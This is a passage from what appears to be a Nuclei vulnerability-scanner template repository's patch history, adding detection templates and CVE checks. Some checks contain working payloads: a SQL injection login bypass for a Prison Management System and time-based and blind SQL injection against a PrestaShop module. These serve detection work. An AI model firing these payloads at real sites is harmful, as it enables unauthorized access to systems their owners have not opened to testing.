dsl dsl: - - 'duration>=6' - - type: status - status: - - 200 \ No newline at end of file + - duration>=6 + - contains(content_type, "text/html") + - contains(header, 'PrestaShop') + condition: and \ No newline at end of file From df1b08e56a6237d14344e22ea46ebe5cd9f39e71 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" Date: Mon, 13 May 2024 16:13:55 +0330 Subject: [PATCH 020/847] Add meilisearch-detect.yaml --- http/technologies/meilisearch-detec.yaml | 32 ++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/technologies/meilisearch-detec.yaml diff --git a/http/technologies/meilisearch-detec.yaml b/http/technologies/meilisearch-detec.yaml new file mode 100644 index 0000000000..d9124a1b89 --- /dev/null +++ b/http/technologies/meilisearch-detec.yaml @@ -0,0 +1,32 @@ +id: meilisearch-detect + +info: + name: Meilisearch Detect + author: userdehghani + severity: info + description: | + an open-source, blazingly fast, and hyper-relevant search engine that will improve your search experience. + reference: + - https://www.meilisearch.com/ + metadata: + verified: true + max-request: 1 + tags: meilisearch,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "application/json")' + + - type: word + part: body + encoding: hex + words: + - "7B22737461747573223A224D65696C697365617263682069732072756E6E696E67227D" \ No newline at end of file From 04d0aa1074aedb99a56148409b98067a2fb7a50a Mon Sep 17 00:00:00 2001 From: "M. Dehghani" Date: Mon, 13 May 2024 16:16:22 +0330 Subject: [PATCH 021/847] test --- http/technologies/meilisearch-detec.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/meilisearch-detec.yaml b/http/technologies/meilisearch-detec.yaml index d9124a1b89..66d5261606 100644 --- a/http/technologies/meilisearch-detec.yaml +++ b/http/technologies/meilisearch-detec.yaml @@ -29,4 +29,4 @@ http: part: body encoding: hex words: - - "7B22737461747573223A224D65696C697365617263682069732072756E6E696E67227D" \ No newline at end of file + - "7B22737461747573223A224D65696C697365617263682069732072756E6E696E67227D" From 1573ed198195d6becd5c0f3a602d127af4b570cc Mon Sep 17 00:00:00 2001 From: "M. Dehghani" Date: Mon, 13 May 2024 18:34:11 +0330 Subject: [PATCH 022/847] Update meilisearch-detec.yaml --- http/technologies/meilisearch-detec.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/technologies/meilisearch-detec.yaml b/http/technologies/meilisearch-detec.yaml index 66d5261606..a2b8b18d5a 100644 --- a/http/technologies/meilisearch-detec.yaml +++ b/http/technologies/meilisearch-detec.yaml @@ -22,8 +22,7 @@ http: matchers: - type: dsl dsl: - - 'status_code == 200' - - 'contains(content_type, "application/json")' + - 'status_code == 200 && contains(content_type, "application/json")' - type: word part: body From 132653dc83fff08bc813192e7866411ac9ead6d9 Mon Sep 17 00:00:00 2001 From: Mohammad D Date: Mon, 13 May 2024 19:24:30 +0330 Subject: [PATCH 023/847] Update and rename meilisearch-detec.yaml to meilisearch-detect.yaml --- .../{meilisearch-detec.yaml => meilisearch-detect.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/technologies/{meilisearch-detec.yaml => meilisearch-detect.yaml} (100%) diff --git a/http/technologies/meilisearch-detec.yaml b/http/technologies/meilisearch-detect.yaml similarity index 100% rename from http/technologies/meilisearch-detec.yaml rename to http/technologies/meilisearch-detect.yaml From 25103ebcb2d3d382c20b57efb3e1a5023fcb026e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 14 May 2024 10:45:58 +0530 Subject: [PATCH 024/847] minor update --- http/technologies/meilisearch-detect.yaml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/http/technologies/meilisearch-detect.yaml b/http/technologies/meilisearch-detect.yaml index a2b8b18d5a..e63d1994aa 100644 --- a/http/technologies/meilisearch-detect.yaml +++ b/http/technologies/meilisearch-detect.yaml @@ -5,13 +5,14 @@ info: author: userdehghani severity: info description: | - an open-source, blazingly fast, and hyper-relevant search engine that will improve your search experience. + An open-source, blazingly fast, and hyper-relevant search engine that will improve your search experience. reference: - https://www.meilisearch.com/ metadata: verified: true max-request: 1 - tags: meilisearch,detect + fofa-query: app="meilisearch" + tags: meilisearch,detect,tech http: - method: GET @@ -22,7 +23,9 @@ http: matchers: - type: dsl dsl: - - 'status_code == 200 && contains(content_type, "application/json")' + - 'status_code == 200' + - 'contains(content_type, "application/json")' + condition: and - type: word part: body From 5163c4711f67223ae8bdba30aea68e1c7b4b81f6 Mon Sep 17 00:00:00 2001 From: Mohammad D Date: Tue, 14 May 2024 10:42:50 +0330 Subject: [PATCH 025/847] Add imgproxy-unauth.yaml --- http/misconfiguration/imgproxy-unauth.yaml | 34 ++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/misconfiguration/imgproxy-unauth.yaml diff --git a/http/misconfiguration/imgproxy-unauth.yaml b/http/misconfiguration/imgproxy-unauth.yaml new file mode 100644 index 0000000000..6975366998 --- /dev/null +++ b/http/misconfiguration/imgproxy-unauth.yaml @@ -0,0 +1,34 @@ +id: imgproxy-unauth + +info: + name: Imgproxy Unauthorized Access + author: userdehghani + severity: high + description: | + imgproxy is a fast and secure standalone server for resizing, processing, and converting images. + remediation: set IMGPROXY_SECRET environment variable. + reference: + - https://docs.imgproxy.net/configuration/options + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.5 + metadata: + verified: true + max-request: 1 + shodan-query: html:"imgproxy" + tags: imgproxy,unauth,misconfig + +variables: + img_url: 'https://upload.wikimedia.org/wikipedia/commons/thumb/2/2f/Google_2015_logo.svg/375px-Google_2015_logo.svg.png' + +http: + - method: GET + path: + - "{{BaseURL}}/_/resize:fill:10:10:0/gravity:sm/plain/{{img_url}}" + + matchers: + - type: dsl + dsl: + - 'status_code==200' + - '("386116288" == mmh3(base64_py(body)))' + condition: and \ No newline at end of file From c279f015123344f5b374e20b59ba85fc3383a6c1 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 14 May 2024 13:58:06 +0530 Subject: [PATCH 026/847] Update meilisearch-detect.yaml --- http/technologies/meilisearch-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/meilisearch-detect.yaml b/http/technologies/meilisearch-detect.yaml index e63d1994aa..e92e1c09cb 100644 --- a/http/technologies/meilisearch-detect.yaml +++ b/http/technologies/meilisearch-detect.yaml @@ -1,7 +1,7 @@ id: meilisearch-detect info: - name: Meilisearch Detect + name: Meilisearch - Detect author: userdehghani severity: info description: | From fc27ea4695bc0b81ea51fad3e6a627573600d2d4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 14 May 2024 14:53:41 +0530 Subject: [PATCH 027/847] added content type --- http/misconfiguration/imgproxy-unauth.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/misconfiguration/imgproxy-unauth.yaml b/http/misconfiguration/imgproxy-unauth.yaml index 6975366998..c2f8e5d113 100644 --- a/http/misconfiguration/imgproxy-unauth.yaml +++ b/http/misconfiguration/imgproxy-unauth.yaml @@ -30,5 +30,6 @@ http: - type: dsl dsl: - 'status_code==200' + - 'contains(content_type, "image/png")' - '("386116288" == mmh3(base64_py(body)))' - condition: and \ No newline at end of file + condition: and From ef5075f2e6573b3692beaf6f3602fe57a4c653f6 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Wed, 15 May 2024 19:31:44 +0200 Subject: [PATCH 028/847] Add files via upload --- .../oracle-ebusiness-suite-panel.yaml | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 http/exposed-panels/oracle-ebusiness-suite-panel.yaml diff --git a/http/exposed-panels/oracle-ebusiness-suite-panel.yaml b/http/exposed-panels/oracle-ebusiness-suite-panel.yaml new file mode 100644 index 0000000000..12ae7d385b --- /dev/null +++ b/http/exposed-panels/oracle-ebusiness-suite-panel.yaml @@ -0,0 +1,37 @@ +id: oracle-ebusiness-suite-panel + +info: + name: Oracle E-Business Suite Login Panel - Detect + author: righettod + severity: info + description: | + Oracle E-Business Suite login panel was detected. + reference: + - https://www.oracle.com/applications/ebusiness/ + metadata: + max-request: 1 + verified: true + shodan-query: http.html:"Oracle UIX" + tags: panel,oracle,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/OA_HTML/AppsLogin" + + redirects: true + max-redirects: 2 + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "/oa_html/oa.jsp", "oracle uix")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)/OA_HTML/cabo/oajsLibs/oafcore([A-Z0-9]+).js' \ No newline at end of file From dc650a0dd3764cfd523009c66f4ae15d9c311d92 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 16 May 2024 13:17:03 +0530 Subject: [PATCH 029/847] Update imgproxy-unauth.yaml --- http/misconfiguration/imgproxy-unauth.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/imgproxy-unauth.yaml b/http/misconfiguration/imgproxy-unauth.yaml index c2f8e5d113..4816d4045c 100644 --- a/http/misconfiguration/imgproxy-unauth.yaml +++ b/http/misconfiguration/imgproxy-unauth.yaml @@ -3,7 +3,7 @@ id: imgproxy-unauth info: name: Imgproxy Unauthorized Access author: userdehghani - severity: high + severity: low description: | imgproxy is a fast and secure standalone server for resizing, processing, and converting images. remediation: set IMGPROXY_SECRET environment variable. From 8d0a62b2c3ea27260eea60427b9b972b4f331eaa Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Thu, 16 May 2024 11:56:24 +0300 Subject: [PATCH 030/847] cve-2024-33288 --- http/cves/2024/CVE-2024-33288.yaml | 34 ++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/cves/2024/CVE-2024-33288.yaml diff --git a/http/cves/2024/CVE-2024-33288.yaml b/http/cves/2024/CVE-2024-33288.yaml new file mode 100644 index 0000000000..2a6cc0471b --- /dev/null +++ b/http/cves/2024/CVE-2024-33288.yaml @@ -0,0 +1,34 @@ +id: CVE-2024-33288 +info: + name: Prison Management System - SQL Injection Authentication Bypass + author: Kazgangap + severity: high + description: Sql injection vulnerability was found on the login page in Prison Management System + reference: + - https://en.0day.today/exploit/39610 + - https://www.sourcecodester.com/sql/17287/prison-management-system.html + tags: cms,cve2024,sqli + +http: + - raw: + - | + POST /prison/Admin/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + txtusername=admin%27+or+%271%27+%3D%271&txtpassword=nuclei&btnlogin= + + - | + GET /prison/Admin/index.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + words: + - "

Change Password

" + - "

Logout

" + + - type: status + status: + - 200 \ No newline at end of file From 9c78200d038e039b125c7ae3ec0b14df2026a69a Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Thu, 16 May 2024 12:02:21 +0300 Subject: [PATCH 031/847] path fix --- http/cves/2024/CVE-2024-33288.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-33288.yaml b/http/cves/2024/CVE-2024-33288.yaml index 2a6cc0471b..581e8dd222 100644 --- a/http/cves/2024/CVE-2024-33288.yaml +++ b/http/cves/2024/CVE-2024-33288.yaml @@ -12,14 +12,14 @@ info: http: - raw: - | - POST /prison/Admin/login.php HTTP/1.1 + POST /Admin/login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded txtusername=admin%27+or+%271%27+%3D%271&txtpassword=nuclei&btnlogin= - | - GET /prison/Admin/index.php HTTP/1.1 + GET /Admin/index.php HTTP/1.1 Host: {{Hostname}} matchers-condition: and From aafbc61a00db5400ff72294dc4f0a262f74d3a1b Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Thu, 16 May 2024 13:29:53 +0300 Subject: [PATCH 032/847] add cve 2023 6065 --- http/cves/2023/CVE-2023-6065.yaml | 42 +++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/cves/2023/CVE-2023-6065.yaml diff --git a/http/cves/2023/CVE-2023-6065.yaml b/http/cves/2023/CVE-2023-6065.yaml new file mode 100644 index 0000000000..a5af699ce8 --- /dev/null +++ b/http/cves/2023/CVE-2023-6065.yaml @@ -0,0 +1,42 @@ +id: CVE-2023-6065 + +info: + name: Quttera Web Malware Scanner <= 3.4.1.48 - Sensitive Data Exposure + author: Kazgangap + severity: medium + description: | + The Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 doesn't restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site's code + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-6065 + - https://wpscan.com/vulnerability/64f2557f-c5e4-4779-9e28-911dfaf2dda5 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2023-6065 + epss-score: 0.00046 + epss-percentile: 0.16179 + cpe: cpe:2.3:a:quttera:quttera_web_malware_scanner:*:*:*:*:*:wordpress:*:* + metadata: + vendor: quttera + product: quttera_web_malware_scanner + framework: wordpress + tags: wpscan,cve2023,wp-plugin,quttera + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/quttera-web-malware-scanner/quttera_wp_report.txt" + + matchers-condition: and + matchers: + - type: word + words: + - "Website Malware Scan Report" + - "Scanned Website" + - "Scan type" + part: body + condition: and + + - type: status + status: + - 200 \ No newline at end of file From 376015ed53564934a2e8ebaf25c20ee9f4246d21 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 16 May 2024 17:01:52 +0530 Subject: [PATCH 033/847] Update CVE-2022-22897.yaml --- http/cves/2022/CVE-2022-22897.yaml | 24 +++++++++++++----------- 1 file changed, 13 insertions(+), 11 deletions(-) diff --git a/http/cves/2022/CVE-2022-22897.yaml b/http/cves/2022/CVE-2022-22897.yaml index 2b4c3ad515..3be9b98bc9 100644 --- a/http/cves/2022/CVE-2022-22897.yaml +++ b/http/cves/2022/CVE-2022-22897.yaml @@ -1,7 +1,7 @@ id: CVE-2022-22897 info: - name: PrestaShop Ap Pagebuilder <= 2.4.4 SQL Injection + name: PrestaShop AP Pagebuilder <= 2.4.4 - SQL Injection author: mastercho severity: critical description: | @@ -60,14 +60,8 @@ http: X-Requested-With: XMLHttpRequest leoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6643=6644-- yMwI - extractors: - - type: regex - name: version - part: body_1 - internal: true - group: 1 - regex: - - "\\s*\\s*<\\/version>" + + matchers-condition: or matchers: - type: dsl name: time-based @@ -76,7 +70,6 @@ http: - 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")' condition: and - - type: dsl name: blind-based dsl: @@ -84,4 +77,13 @@ http: - 'contains(body_3, "content") && contains(body_3, "{{Hostname}}")' - '!contains(body_4, "content") && !contains(body_4, "{{Hostname}}")' - 'len(body_3) > 200 && len(body_4) <= 22' - condition: and \ No newline at end of file + condition: and + + extractors: + - type: regex + name: version + part: body_1 + internal: true + group: 1 + regex: + - "\\s*\\s*<\\/version>" From cf0d9955b3e881117ecf260116665dd3bcaac381 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 16 May 2024 17:08:52 +0530 Subject: [PATCH 034/847] Update CVE-2023-46347.yaml --- http/cves/2023/CVE-2023-46347.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/http/cves/2023/CVE-2023-46347.yaml b/http/cves/2023/CVE-2023-46347.yaml index 7a9a3cacbe..ff780a2261 100644 --- a/http/cves/2023/CVE-2023-46347.yaml +++ b/http/cves/2023/CVE-2023-46347.yaml @@ -1,4 +1,4 @@ -id: CVE-2023-46347 +id: CVE-2023-46347 info: name: PrestaShop Step by Step products Pack - SQL Injection @@ -12,7 +12,7 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cve-id: CVE-2023-46347 + cve-id: CVE-2023-46347 cwe-id: CWE-89 epss-score: 0.00076 epss-percentile: 0.31923 @@ -39,7 +39,7 @@ http: matchers: - type: dsl dsl: - - duration>=6 - - contains(content_type, "text/html") - - contains(header, 'PrestaShop') - condition: and \ No newline at end of file + - 'duration>=6' + - 'contains(content_type, "text/html")' + - 'contains(header, "PrestaShop")' + condition: and From 9604c8e294f4e2a28f35e3ea9f4e9f32cc5e2006 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 16 May 2024 17:14:06 +0530 Subject: [PATCH 035/847] lint fix --- http/cves/2023/CVE-2023-46347.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-46347.yaml b/http/cves/2023/CVE-2023-46347.yaml index 31b06c109a..257b83cf73 100644 --- a/http/cves/2023/CVE-2023-46347.yaml +++ b/http/cves/2023/CVE-2023-46347.yaml @@ -12,7 +12,7 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cve-id: CVE-2023-46347 + cve-id: CVE-2023-46347 cwe-id: CWE-89 epss-score: 0.00076 epss-percentile: 0.31923 @@ -43,4 +43,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(header, "PrestaShop")' condition: and -# digest: 4b0a00483046022100b87838fd7d263c207e34f1457465b2f00642af421684161d37081d4b8ad0413b022100f379548beef0caf23301dc7d71e0a9d46c803654f1815f49a1c4d8838bc7761e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b87838fd7d263c207e34f1457465b2f00642af421684161d37081d4b8ad0413b022100f379548beef0caf23301dc7d71e0a9d46c803654f1815f49a1c4d8838bc7761e:922c64590222798bb761d5b6d8e72950 From 4c098184f574370e1691886c15340162f96ce6dc Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 16 May 2024 21:45:15 +0530 Subject: [PATCH 036/847] minor update --- http/cves/2023/CVE-2023-6065.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-6065.yaml b/http/cves/2023/CVE-2023-6065.yaml index a5af699ce8..dc145e56a6 100644 --- a/http/cves/2023/CVE-2023-6065.yaml +++ b/http/cves/2023/CVE-2023-6065.yaml @@ -36,7 +36,7 @@ http: - "Scan type" part: body condition: and - + - type: status status: - - 200 \ No newline at end of file + - 200 From 06f33856ace97dcac94fbe186ea5286717db5b06 Mon Sep 17 00:00:00 2001 From: dcruzec Date: Thu, 16 May 2024 14:03:14 -0400 Subject: [PATCH 037/847] Add files via upload submitting a pull request for vrealize hyperic login panel. --- .../vrealize-hyperic-login-panel.yaml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 http/exposed-panels/vrealize-hyperic-login-panel.yaml diff --git a/http/exposed-panels/vrealize-hyperic-login-panel.yaml b/http/exposed-panels/vrealize-hyperic-login-panel.yaml new file mode 100644 index 0000000000..eb56e21586 --- /dev/null +++ b/http/exposed-panels/vrealize-hyperic-login-panel.yaml @@ -0,0 +1,30 @@ +id: vrealize-hyperic-login-panel + +info: + name: vRealize Hyperic Login Panel - Detect + author: Charles D. + severity: info + description: vRealize Hyperic login panel was detected + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + metadata: + max-request: 1 + shodan-query: http.title:"Sign In - Hyperic" + tags: login,panel,vrealize-hyperic + +http: + - method: GET + path: + - '{{BaseURL}}/app/login' + + matchers-condition: and + matchers: + - type: word + words: + - "Sign In - Hyperic" + part: body + + - type: status + status: + - 200 \ No newline at end of file From 78513d5e9722b7f054ad5272037fcc03ec411cdd Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 17 May 2024 14:43:28 +0530 Subject: [PATCH 038/847] minor-update --- http/cves/2023/CVE-2023-6065.yaml | 15 ++++++++++++--- 1 file changed, 12 insertions(+), 3 deletions(-) diff --git a/http/cves/2023/CVE-2023-6065.yaml b/http/cves/2023/CVE-2023-6065.yaml index dc145e56a6..18d4cec997 100644 --- a/http/cves/2023/CVE-2023-6065.yaml +++ b/http/cves/2023/CVE-2023-6065.yaml @@ -6,21 +6,25 @@ info: severity: medium description: | The Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 doesn't restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site's code + remediation: Fixed in 3.4.2.1 reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-6065 - https://wpscan.com/vulnerability/64f2557f-c5e4-4779-9e28-911dfaf2dda5 + - https://wordpress.org/plugins/quttera-web-malware-scanner/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-6065 epss-score: 0.00046 - epss-percentile: 0.16179 + epss-percentile: 0.16199 cpe: cpe:2.3:a:quttera:quttera_web_malware_scanner:*:*:*:*:*:wordpress:*:* metadata: + verified: true + max-request: 1 vendor: quttera product: quttera_web_malware_scanner framework: wordpress - tags: wpscan,cve2023,wp-plugin,quttera + tags: cve,cve2023,wp-plugin,quttera,wpscan, http: - method: GET @@ -30,13 +34,18 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "Website Malware Scan Report" - "Scanned Website" - "Scan type" - part: body condition: and + - type: word + part: header + words: + - "text/plain" + - type: status status: - 200 From 56721132b320d52c2c1cda7a21f2ac49cf5c17a1 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 17 May 2024 14:46:10 +0530 Subject: [PATCH 039/847] minor update --- http/cves/2024/CVE-2024-33288.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-33288.yaml b/http/cves/2024/CVE-2024-33288.yaml index 581e8dd222..0d7dc9b9f7 100644 --- a/http/cves/2024/CVE-2024-33288.yaml +++ b/http/cves/2024/CVE-2024-33288.yaml @@ -1,13 +1,15 @@ id: CVE-2024-33288 + info: name: Prison Management System - SQL Injection Authentication Bypass author: Kazgangap severity: high - description: Sql injection vulnerability was found on the login page in Prison Management System + description: | + Sql injection vulnerability was found on the login page in Prison Management System reference: - https://en.0day.today/exploit/39610 - https://www.sourcecodester.com/sql/17287/prison-management-system.html - tags: cms,cve2024,sqli + tags: cve,cve2024,cms,sqli http: - raw: @@ -16,7 +18,7 @@ http: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - txtusername=admin%27+or+%271%27+%3D%271&txtpassword=nuclei&btnlogin= + txtusername=admin%27+or+%271%27+%3D%271&txtpassword={{randstr}}&btnlogin= - | GET /Admin/index.php HTTP/1.1 @@ -31,4 +33,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 From b5b82da8d5821f2ab800e4e59fba273b65a691be Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 17 May 2024 14:50:04 +0530 Subject: [PATCH 040/847] minor update --- http/cves/2024/CVE-2024-33288.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/http/cves/2024/CVE-2024-33288.yaml b/http/cves/2024/CVE-2024-33288.yaml index 0d7dc9b9f7..23f85208d8 100644 --- a/http/cves/2024/CVE-2024-33288.yaml +++ b/http/cves/2024/CVE-2024-33288.yaml @@ -9,6 +9,10 @@ info: reference: - https://en.0day.today/exploit/39610 - https://www.sourcecodester.com/sql/17287/prison-management-system.html + metadata: + verified: true + max-request: 2 + shodan-query: title:"Prison Management System" tags: cve,cve2024,cms,sqli http: @@ -30,6 +34,8 @@ http: words: - "

Change Password

" - "

Logout

" + - "Admin Dashboard | Prison Management system" + condition: and - type: status status: From ac967a09938beb5b63190f499bec7d27d5a032ae Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 18 May 2024 04:49:51 +0530 Subject: [PATCH 041/847] minor update --- .../vrealize-hyperic-login-panel.yaml | 26 ++++++++++--------- 1 file changed, 14 insertions(+), 12 deletions(-) diff --git a/http/exposed-panels/vrealize-hyperic-login-panel.yaml b/http/exposed-panels/vrealize-hyperic-login-panel.yaml index eb56e21586..d8fc286fe9 100644 --- a/http/exposed-panels/vrealize-hyperic-login-panel.yaml +++ b/http/exposed-panels/vrealize-hyperic-login-panel.yaml @@ -1,30 +1,32 @@ -id: vrealize-hyperic-login-panel +id: vrealize-hyperic-panel -info: +info: name: vRealize Hyperic Login Panel - Detect - author: Charles D. + author: Charles D severity: info - description: vRealize Hyperic login panel was detected - classification: + description: | + vRealize Hyperic login panel was detected + classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: max-request: 1 shodan-query: http.title:"Sign In - Hyperic" - tags: login,panel,vrealize-hyperic + verified: true + tags: login,panel,vrealize,hyperic http: - method: GET - path: + path: - '{{BaseURL}}/app/login' matchers-condition: and - matchers: + matchers: - type: word - words: - - "Sign In - Hyperic" part: body - + words: + - "Sign In - Hyperic" + - type: status status: - - 200 \ No newline at end of file + - 200 From 40937f3702514d2a299acdf28e44bff08751f599 Mon Sep 17 00:00:00 2001 From: Icaro Torres <18042205+icarot@users.noreply.github.com> Date: Sun, 19 May 2024 15:47:40 -0300 Subject: [PATCH 042/847] Create sparklighter-detect.yaml This nuclei template detects a Spark Lighter server, a REST API for Apache Spark on K8S or YARN. --- http/technologies/sparklighter-detect.yaml | 27 ++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 http/technologies/sparklighter-detect.yaml diff --git a/http/technologies/sparklighter-detect.yaml b/http/technologies/sparklighter-detect.yaml new file mode 100644 index 0000000000..879326d922 --- /dev/null +++ b/http/technologies/sparklighter-detect.yaml @@ -0,0 +1,27 @@ +id: sparklighter-detect + +info: + name: Spark Lighter Detection + author: icarot + severity: info + description: This nuclei template detects a Spark Lighter server, a REST API for Apache Spark on K8S or YARN. + classification: + cpe: cpe:2.3:a:apache:spark:*:*:*:*:*:*:*:* + metadata: + max-request: 5 + vendor: lighter + product: spark_lighter_server + category: productivity + tags: tech,lighter,spark,detect + +requests: + - method: GET + path: + - "{{BaseURL}}/lighter/api" + - "{{BaseURL}}/lighter/batches" + - "{{BaseURL}}/lighter/sessions" + + matchers: + - type: status + status: + - 200 From 392c43a17e9bcbb98ce4facf98378b9901b473a5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 20 May 2024 03:50:34 +0000 Subject: [PATCH 044/847] Auto Generated Templates Checksum [Mon May 20 03:50:34 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7ea32eef24..c50f4a61a9 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2534,7 +2534,7 @@ http/cves/2022/CVE-2022-2219.yaml:f7b399fbf13b315ba3572bb95e8a517605780ccc http/cves/2022/CVE-2022-22242.yaml:b436f4fa38b41e393a70c271ce5808da14ca1200 http/cves/2022/CVE-2022-22536.yaml:2a50caf1a9f68f3369e917f3bb7f1d8e6b65b6d8 http/cves/2022/CVE-2022-22733.yaml:89003df5b937b3ab5ca97bea819a242ba1f8fbee -http/cves/2022/CVE-2022-22897.yaml:d3cf66d537cb79460a1ac71756e6f04915bec05c +http/cves/2022/CVE-2022-22897.yaml:950280f14d1635b6c9c90c391543df7d5358c9ac http/cves/2022/CVE-2022-2290.yaml:fa4cd065d732bf98911b59c6654a606b08743383 http/cves/2022/CVE-2022-22947.yaml:eb9d29cf2146e3457d9e38b5c4f1bdd37b49f9dc http/cves/2022/CVE-2022-22954.yaml:7fc1b436de35daea85136a6ad03332cc25cf27e4 @@ -3177,7 +3177,7 @@ http/cves/2023/CVE-2023-45852.yaml:121fe7235b0b17c24564aabf8701636466e6c686 http/cves/2023/CVE-2023-45855.yaml:4a15e64df3b4a6fff79a7989929ea4e47e96c964 http/cves/2023/CVE-2023-4596.yaml:2f579cfedfcc066453d4d03b303efa1505fcc2cb http/cves/2023/CVE-2023-4634.yaml:a27a590c0501711f8c63e214ca7d76c1b3e7bef1 -http/cves/2023/CVE-2023-46347.yaml:78b9ee5474f96b6390c07647e986fe9bc0ab2e96 +http/cves/2023/CVE-2023-46347.yaml:dd09061e7e6da8f7b1a2804140fd6b019576d0f2 http/cves/2023/CVE-2023-46359.yaml:2c5eadff5358c49c151934a282621b2bfce3bf92 http/cves/2023/CVE-2023-46574.yaml:3ee23f056a218c79387d3ae1c3cdbb51aeba5191 http/cves/2023/CVE-2023-46747.yaml:b010f6e5c18a3f337a7f2e266f9330a39635d36c @@ -5473,7 +5473,7 @@ http/misconfiguration/installer/tasmota-install.yaml:f77cc6de67828f45e5d0e528f77 http/misconfiguration/installer/tautulli-install.yaml:babc01a81e184ecadb2cc433e7b0cdcc1195eb8b http/misconfiguration/installer/testrail-install.yaml:ffd3e6d389e273255f6e6b97ef617680c3336895 http/misconfiguration/installer/tiny-rss-installer.yaml:fffe28f654914f0e91b3afe7aeecd942d1fb1705 -http/misconfiguration/installer/trilium-notes-installer.yaml:30f3e838a3e50cf800ac21ebb8c33cbad2b8d7f6 